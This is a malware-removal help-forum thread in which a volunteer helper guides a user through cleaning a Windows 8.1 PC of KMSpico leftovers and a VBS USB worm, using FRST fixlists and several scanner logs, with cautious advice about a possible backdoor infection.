FirewallRules: [{542D013C-5031-4FA4-BA2E-66AF36AA8A4A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{85A6F4B3-3854-44EF-AF6D-5A9AD2627FDD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{A6B398C6-2FD4-4F27-997A-04FF98D16674}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C8BFF980-5F3B-43CE-A980-1F97D4E629BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{205EE810-DC29-4E70-AC88-B70C1475171C}] => (Allow) C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe

==================== Restore Points =========================

04-07-2016 13:40:41 Remoção do Language Pack
12-07-2016 18:55:37 Ponto de Verificação Agendado
13-07-2016 19:26:37 ASU_MSI_TRAN
16-07-2016 12:48:37 Removed Vegas Pro 13.0 (64-bit)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/16/2016 01:38:29 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/16/2016 01:33:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome da aplicação com falha: launcher.exe_Avast SafeZone Browser, versão: 1.48.2066.114, carimbo de data/hora: 0x5763cc7e
Nome do módulo com falha: launcher.exe, versão: 1.48.2066.114, carimbo de data/hora: 0x5763cc7e
Código de exceção: 0x80000003
Desvio de falha: 0x000223e9
ID do processo com falha: 0x1750
Hora de início da aplicação com falha: 0xlauncher.exe_Avast SafeZone Browser0
Caminho da aplicação com falha: launcher.exe_Avast SafeZone Browser1
Caminho do módulo com falha: launcher.exe_Avast SafeZone Browser2
ID do Relatório: launcher.exe_Avast SafeZone Browser3
Nome completo do pacote com falha: launcher.exe_Avast SafeZone Browser4
ID da aplicação relativa ao pacote com falha: launcher.exe_Avast SafeZone Browser5

Error: (07/16/2016 01:30:39 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4

Error: (07/16/2016 01:30:33 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll4

Error: (07/16/2016 01:30:07 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/16/2016 01:24:52 PM) (Source: MsiInstaller) (EventID: 10005) (User: Error)
Description: Product: Visual Studio 2015 Prerequisites - ENU Language Pack -- The installer has encountered an unexpected error installing this package. This may indicate a problem with this package. The error code is 2203. The arguments are: C:\Windows\Installer\inprogressinstallinfo.ipi, -2147287008,

Error: (07/16/2016 01:21:24 PM) (Source: HlpCtntMgr) (EventID: 1003) (User: )
Description: Help Content Manager exited with error: NoBooksToUninstall

Error: (07/13/2016 11:59:03 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/13/2016 10:51:12 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/13/2016 10:41:18 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]


System errors:
=============
Error: (07/16/2016 01:25:51 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}

Error: (07/13/2016 10:41:07 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {3EEF301F-B596-4C0B-BD92-013BEAFCE793}

Error: (07/13/2016 07:02:18 PM) (Source: Ntfs) (EventID: 137) (User: )
Description: O gestor de recursos de transações predefinido no volume F: encontrou um erro permanente e não conseguiu iniciar. Os dados contêm o código de erro.

Error: (07/13/2016 06:10:39 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/13/2016 06:10:09 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/12/2016 06:59:41 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/12/2016 06:59:11 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/12/2016 03:43:33 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/12/2016 03:43:03 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/08/2016 02:49:50 PM) (Source: Microsoft-Windows-LanguagePackSetup) (EventID: 1000) (User: NT AUTHORITY)
Description: Falha na inicialização do Cliente de CBS. Último erro: 0x80080005


==================== Memory info ===========================

Processor: Intel® Core™ i5-3317U CPU @ 1.70GHz
Percentage of memory in use: 21%
Total physical RAM: 5845.53 MB
Available physical RAM: 4613.16 MB
Total Virtual: 6805.54 MB
Available Virtual: 5528.68 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:505.08 GB) (Free:420.96 GB) NTFS
Drive d: (Disco Pessoal) (Fixed) (Total:150 GB) (Free:7.24 GB) NTFS
Drive e: (Disco Local) (Fixed) (Total:250 GB) (Free:8.99 GB) NTFS
Drive f: () (Removable) (Total:1.86 GB) (Free:1.86 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D4A83735)

Partition: GPT.

========================================================
Disk: 1 (Size: 22.4 GB) (Disk ID: 9F8C219F)

Partition: GPT.

========================================================
Disk: 2 (Size: 1.9 GB) (Disk ID: C3D04DA2)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=0B)

==================== End of Addition.txt ============================

 

 

 

 

 

 

 

 

 

CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
scanner sequence 3.RP.11.DRNASZ
 ----- EOF -----
 



#6 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,773 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:12:18 AM

Posted 16 July 2016 - 03:24 PM

Thank you for your understanding and the information.

Let's start with this.

===================================================

Peer to Peer (P2P) Warning

--------------------

Going over your logs I noticed that you have evidence of P2P downloads. It is pretty much certain that if you continue to use P2P programs, you will get infected again.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a smörgåsbord of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
If you are still leaning toward using this program, please take a look at this information about Ransomware which can be delivered via P2P file transfers. The newest variation of Ransomware can make it impossible to recover the files this malicious software encrypts. In other words, you will probably lose most if not all of your valuable information, including pictures. In addition it has recently been reported that P2P downloads may be tracked resulting in your IP address being monitored by copyright authorities.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it as fixlist.txt in the same location/folder as FRST.exe (<<<Important)
C:\Program Files\KMSpico
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [AdobeBridge] => [X]
C:\Users\User not found\AppData\Roaming\WindowsServices\helper.vbs ()
C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-07-13]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-07-13]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [737984 2015-08-30] (@ByELDI) [File not signed]
2016-07-15 14:55 - 2016-07-15 15:00 - 00000314 _____ C:\Users\User not found\Desktop\new 1.vbs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
C:\Users\User not found\AppData\Local\Temp\xmlUpdater.exe
Task: {14E6283D-7A9D-4001-AF08-EADFA636339C} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [2015-08-30] (@ByELDI)
Task: {60124AD6-BB12-49B0-9EFD-D3E89CB9B4F9} - \Optimize Start Menu Cache Files-S-1-5-21-2194052053-610074514-4291411958-1001 -> No File <==== ATTENTION
FirewallRules: [{8D5A8400-6A2E-48DE-9B2D-D971ABF18C36}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{7F928E53-1420-4A10-8920-CD1BA0769E78}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
  • Right click on FRST.exe, select Run as administrator then press the Fix button
  • When completed he tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • Update on computer performance

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#7 TheGoodGuy

TheGoodGuy
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 16 July 2016 - 05:02 PM

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
C:\Users\User not found\AppData\Local\Temp\xmlUpdater.exe
Task: {14E6283D-7A9D-4001-AF08-EADFA636339C} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [2015-08-30] (@ByELDI)
Task: {60124AD6-BB12-49B0-9EFD-D3E89CB9B4F9} - \Optimize Start Menu Cache Files-S-1-5-21-2194052053-610074514-4291411958-1001 -> No File <==== ATTENTION
FirewallRules: [{8D5A8400-6A2E-48DE-9B2D-D971ABF18C36}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{7F928E53-1420-4A10-8920-CD1BA0769E78}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
*****************

"C:\Program Files\KMSpico" => not found.
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge => value not found.
"C:\Users\User not found\AppData\Roaming\WindowsServices\helper.vbs ()" => not found.
C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk => moved successfully
HKLM\Software\Mozilla\Firefox\Extensions\\wrc@avast.com => value removed successfully

"C:\Program Files\AVAST Software\Avast\WebRep\FF" folder move:

Could not move "C:\Program Files\AVAST Software\Avast\WebRep\FF" => Scheduled to move on reboot.

HKLM\Software\Mozilla\Firefox\Extensions\\sp@avast.com => value removed successfully

"C:\Program Files\AVAST Software\Avast\SafePrice\FF" folder move:

Could not move "C:\Program Files\AVAST Software\Avast\SafePrice\FF" => Scheduled to move on reboot.

HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\wrc@avast.com => value removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\sp@avast.com => value removed successfully
Service KMSELDI => service not found.
C:\Users\User not found\Desktop\new 1.vbs => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico" => not found.
C:\Users\User not found\AppData\Local\Temp\xmlUpdater.exe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14E6283D-7A9D-4001-AF08-EADFA636339C} => key not found.
C:\Windows\System32\Tasks\AutoPico Daily Restart => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoPico Daily Restart => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{60124AD6-BB12-49B0-9EFD-D3E89CB9B4F9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{60124AD6-BB12-49B0-9EFD-D3E89CB9B4F9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-1-5-21-2194052053-610074514-4291411958-1001" => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8D5A8400-6A2E-48DE-9B2D-D971ABF18C36} => value not found.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{7F928E53-1420-4A10-8920-CD1BA0769E78} => value not found.

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2016-07-16 22:49:18)

"C:\Program Files\AVAST Software\Avast\WebRep\FF" => Could not move
"C:\Program Files\AVAST Software\Avast\SafePrice\FF" => Could not move

==== End of Fixlog 22:49:19 ====

 

 

 

 

 

 

 

 

 

The computer performance looks the same...



#8 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,773 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:12:18 AM

Posted 16 July 2016 - 05:51 PM

Thank you.

Please do these things for me.

===================================================

Adware Removal Tool by TSA

--------------------
  • Please download Adware Removal Tool and save it to your Desktop.
  • Right click on the icon and select Run as administrator.
  • Select: Yes, I agree.
  • Click Scan.
  • If objects are found, click OK.
  • Review the log and uncheck any items you want to keep (somewhat uncommon).
  • Click Clean.
  • If requested, click OK to close any open browsers.
  • Click OK after the cleaning process has Successfully Finished.
  • Click Save this Result and save the file to your Desktop asART.txt.
  • Confirm the file was successfully saved.
  • Click Finished, then close the browser that will open.
  • Copy and paste ART.txt
===================================================

AdwCleaner by Xplode - Delete Adware

-------------------
  • Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed you will see Pending. Please check elements you don't want to remove above the progress bar
  • Click on Cleaning
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Your computer will be rebooted automatically. A text file will open after the restart
  • Copy and paste the contents in your reply
===================================================

Farbar's Recovery Scan Tool Search

--------------------
  • Launch FRST
  • Copy/paste the following in the Search Field
helper.vbs;installer.vbs;movemenoreg.vbs
  • Click Search File(s) button
  • When completed click OK and a Search.txt document will open on your desktop
  • Copy and paste the contents of that document your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • ART log
  • AdwCleaner log
  • Search log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#9 TheGoodGuy

TheGoodGuy
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 17 July 2016 - 02:46 PM

The program Adware Removal Tool by TSA didn't found anything

 

 

 

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Adware Removal Tool 5.1
Time: 2016_07_17_19_07_56
OS: Windows 8.1 Pro - x64 Bit
Account Name: User not found
Adware Definition: 07162016
Elapsed time: 09:56
Scan Status:- Automatic Done

\\\\\\\\\\\\\\\\\\\\\\\ Scan Logs \\\\\\\\\\\\\\\\\\\\\\


No results found
 

 

 

 

 

 

 

 

 

 

# AdwCleaner v5.201 - Logfile created 17/07/2016 at 19:31:40
# Updated 30/06/2016 by ToolsLib
# Database : 2016-07-16.1 [Server]
# Operating system : Windows 8.1 Pro  (X64)
# Username : User not found - ERROR
# Running from : C:\Users\User not found\Desktop\AdwCleaner.exe
# Option : Clean
# Support : https://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****


***** [ Files ] *****


***** [ DLLs ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
[-] Key Deleted : HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}

***** [ Web browsers ] *****


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [1280 bytes] - [17/07/2016 19:31:40]
C:\AdwCleaner\AdwCleaner[S1].txt - [1301 bytes] - [17/07/2016 19:04:59]
C:\AdwCleaner\AdwCleaner[S2].txt - [1374 bytes] - [17/07/2016 19:29:31]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1499 bytes] ##########

 

 

 

 

 

 

 

 

 

 

Farbar Recovery Scan Tool (x64) Version: 17-07-2016 03
Ran by User not found (2016-07-17 19:51:55)
Running from C:\Users\User not found\Downloads
Boot Mode: Normal

================== Search Files: "helper.vbs;installer.vbs;movemenoreg.vbs" =============

C:\Users\User not found\AppData\Roaming\WindowsServices\helper.vbs
[2016-06-29 16:58][2016-05-23 10:38] 0002187 _RASH () 309E4806EC5C609A33FE7F739BAD2A7B [File not signed]

C:\Users\User not found\AppData\Roaming\WindowsServices\installer.vbs
[2016-06-29 16:58][2016-03-26 21:29] 0003667 _RASH () 9AE0E85C4C4FD4F6167F45AF65CC3879 [File not signed]

C:\Users\User not found\AppData\Roaming\WindowsServices\movemenoreg.vbs
[2016-06-29 16:58][2016-03-26 21:28] 0001703 _RASH () 53C9B22CB0A40A126C8422362C2F78D8 [File not signed]

====== End of Search ======



#10 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,773 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:12:18 AM

Posted 17 July 2016 - 03:51 PM

Please do this.

===================================================

Rem-VBSworm Utility

--------------------
  • Insert your infected USB device into your computer
  • Hit the Windows Key + E at the same time to launch Windows Explorer
  • Identify the drive letter for your USB device <<Important
  • Download Rem-VBSworm and save it to your Desktop
  • Right click on the icon and select Run as administrator
  • Click Yes on any User Account Control warning
  • In the Remediate VBS Worm window type A at the command prompt then hit Enter
  • Once completed, comply with the Press any key to continue . . . prompt
  • Type B at the command prompt then hit Enter
  • Type in the correct drive letter for your USB drive (only the letter itself and nothing else) Warning, do not type in C drive
  • Once completed, comply with the Press any key to continue . . . prompt
  • Type Q at the command prompt then hit Enter
  • Copy and paste the contents of the report that will appear on your Desktop in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Rem - VBS log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#11 TheGoodGuy

TheGoodGuy
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 17 July 2016 - 04:09 PM

Rem-VBSworm v8.0

=========== - General info:

Running under: User not found on profile: C:\Users\User not found
Computer name: ERROR

Operating System:
Microsoft Windows 8.1 Pro  

Boot Mode:
Normal boot  

Antivirus software installed:
Windows Defender  

avast! Antivirus  


Executed on: 17/07/2016 @ 22:06:34,30

=========== - Drive info:

Listing currently attached drives:
Caption  Description       VolumeName     

C:       Local Fixed Disk                 

D:       Local Fixed Disk  Disco Pessoal  

E:       Local Fixed Disk  Disco Local    

G:       CD-ROM Disc                      

H:       Removable Disk                   




Physical drives information:
C: \Device\HarddiskVolume4 NTFS
D: \Device\HarddiskVolume5 NTFS
E: \Device\HarddiskVolume6 NTFS
H: \Device\HarddiskVolume15 NTFS

=========== - Disinfection info:

SUCCESS: The process "wscript.exe" with PID 1844 has been terminated.
SUCCESS: The process "wscript.exe" with PID 4440 has been terminated.

INFO: No tasks running with the specified criteria.

INFO: No tasks running with the specified criteria.
Deleted file - C:\Users\User not found\AppData\Roaming\Notepad++\backup\movemenoreg.vbs@2016-07-15_151433

=========== - Shortcut info:

Shortcut: "C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk"
Malware found in shortcut: "helper.vbs"
----------------------------------------------------------------

=========== - Scheduled tasks info:

TaskName:                             \Microsoft\Windows\NetTrace\GatherNetworkInfo
Next Run Time:                        N/A
Last Run Time:                        N/A
Task To Run:                          %windir%\system32\gatherNetworkInfo.vbs
Start In:                             $(Arg1)
Comment:                              Network information collector
Run As User:                          Utilizadores

=========== - USB drive info:

h: selected

USB Device ID:
USBSTOR\DISK&VEN_UT163&PROD_USB2FLASHSTORAGE&REV_0.00\080318022E4145&0  

SCSI\DISK&VEN_SANDISK&PROD_SSD_I100_24GB\4&FD11464&0&010000             

SCSI\DISK&VEN_&PROD_ST1000LM024_HN-M\4&FD11464&0&000000                 




Deleted file - h:\.lnk
Deleted file - h:\WindowsServices\helper.vbs
Deleted file - h:\WindowsServices\installer.vbs
Deleted file - h:\WindowsServices\movemenoreg.vbs
WARNING... Possible Andromeda/Gamarue infection...
Listing root contents of h:


17/07/2016  22:04    <DIR>          _
17/07/2016  22:08    <DIR>          WindowsServices
               0 File(s)              0 bytes
               2 Dir(s)     993ÿ771ÿ520 bytes free

USB drive disinfected and files unhidden


=====================================================
Scan finished at: 22:08:36,78
Send this log only if requested by a helper.
=====================================================

Made by @bartblaze
Tool to delete VBS autorun worm and unhide files
Quarantine folder on: C:\Rem-VBSqt
Info: https://bartblaze.blogspot.com/2014/02/remediate-vbs-malware.html
 



#12 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,773 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:12:18 AM

Posted 17 July 2016 - 04:25 PM

Thank you,

The identified "Possible" infection is known as a Backdoor Trojan. If you are unfamiliar with this type of infection please consider the following:

===================================================

BACKDOOR WARNING!

--------------------

One or more of the identified infections is a Backdoor Trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. Please let me know if you have already noticed evidences of financial institution irregularities. Those accounts should be monitored from this point forward.

Though the trojan has been identified and can be killed, because of it's backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 

Here are some thoughts I have put together for people who ask what they should do in light of the infection. Ultimately each user must decide for themselves what to do and the below are things you might want to consider.

It is necessary for us to at least make you aware of the worse case scenario. This is because of the potential Backdoor Trojans bring with them, but it is not a determination on our part that your situation currently falls within this worse case scenario.

Ultimately it is a personal decision whether to reformat or not. What decision should you make to let you sleep well at night? It is different for different people. I will say whether rightly or wrongly most people decide to clean and not reformat, at least initially.

The only insight I can offer is how I evaluate the issue personally even though I have never had a Backdoor Trojan on my computer. One of the primary purposes for malicious software is to somehow separate you from your money. It seems reasonable to assume that a thief trying to take your money via a Backdoor Trojan will hit you hard, and quickly. Once your computer starts to act up and you become suspicious you have the opportunity to eliminate access to your computer and change the information taken, namely account and password information. The key to this, in my opinion, is whether or not you have noticed any irregularities in your banking or other financial institutions, or things like email and social network accounts (i.e. Facebook). If you have not seen any evidence of that then you may question whether your information has truly been stolen. If it seems it hasn't, and your critical information has been changed, it is reasonable to be more confident you are safe but you must stop short of claiming an absolute guarantee.

If, after careful consideration you decide not to reformat your computer it would be wise to continue monitoring your sensitive data and don't wait to address future symptoms on your computer which seem to be malware related.

The bottom line, the only way to be absolutely sure to be rid of a Backdoor Trojan is to reformat. The decision is yours.

Oh My!


We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do. If you decide to go through with the cleanup, please proceed with the following steps.

===================================================

Malwarebytes Anti-Malware Free and Malwarebytes Chameleon Including External Drive

----------

Plug in your USB device and select that as an external drive as instructed below.
  • Download Malwarebytes Anti-Malware Free and save it to your desktop
  • Double click the desktop icon, click Run, then Yes
  • Click OK for English, then click Next
  • Select I accept the agreement then continue to click Next then finally click Install
  • Uncheck Enable free trial of Malwarebytes Anti-Malware Premium if you do not want the free trial of the paid version, then click Finish
  • If you are notified the Database is out of date click Update Now
  • Attach any external drives you want to scan if not already attached
  • Click the Scan button near the top
  • Select Custom Scan then click Configure Scan
  • Place a check mark in any additonal drives you would like to scan
  • Click Scan now

----------
Note: If Malwarebytes will not launch please do the following to launch Malwarebytes Chameleon:
Click Start (Start, Search, All files and folders for Windows XP) then type mbam
Double click one of the four following files (if one does not work try the next one, and so on) - A black command window will open. Follow those instructions until the Malwarebytes program starts the scan

mbam-chameleon.scr
mbam-chameleon
mbam-chameleon.exe
mbam-chameleon.com

----------

  • When completed click the down arrow on Export Log and select Text file (*.txt)
  • Save the file to your desktop as MBAM
  • Click Apply Actions then restart your computer if requested
  • Copy and past the contents of MBAM.txt in your reply
===================================================

ESET Online Scanner with External Device

--------------------

I'd like us to scan your machine with ESET OnlineScan This process may may take several hours, that is normal. Plug in your USB device and select that as an external drive as instructed below.
  • Download esetsmartinstaller_enu.exe and save it to your Desktop
  • Double click the icon
  • Check YES, I accept the Terms of Use
  • Click the Start button
  • Accept any security warnings from your browser
  • Click Advanced settings
  • Check the following items

Enable detection of potentially unwanted applications
Remove found threats
Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology

  • Click Change next to Current scan targets:
  • Place a check mark in any additional drive you wish to scan then click OK
  • Click Start
  • ESET will then download updates and begin scanning your computer
  • If no threats are found simply click Uninstall application on close and hit Finish
  • If threats are found click List of found threats
  • Click Export to text file
  • Save the file on your Desktop as ESET.txt
  • Click Back
  • Check Uninstall application on close and Delete quarantined files
  • Click Finish
  • Close the ESET Online Scanner window
  • Copy and paste the contents of ESET.txt in your reply
===================================================

Run a fresh FRST scan including Additon.txt and post the results.

===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • ESET log
  • Emsisoft log
  • FRST log
  • Addition log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#13 TheGoodGuy

TheGoodGuy
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 18 July 2016 - 08:18 AM

I don't think I have a Backdoor Trojan, because nothing changed in my pc and nothing strange happened. Fortunately I don't have any bank account in this pc and nothing really important...

After use this two programs I think the virus was deleted, because after the cleaning I put a formated Pen Drive and no shortcuts was created.

 

 

 

 

 

 

 

 

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 18/07/2016
Scan Time: 11:30
Logfile: MBAM.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.07.18.05
Rootkit Database: v2016.05.27.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: User not found

Scan Type: Custom Scan
Result: Completed
Objects Scanned: 519362
Time Elapsed: 1 hr, 31 min, 31 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

 

 

 

 

 

 

 

 

 

 

C:\Users\User not found\AppData\Local\Mozilla\Firefox\Profiles\3ajkld8y.default\cache2\entries\2D37F3A317B77B49C2F375BF9F79F05D14BB82A4    VBS/Agent.NKG worm    deleted
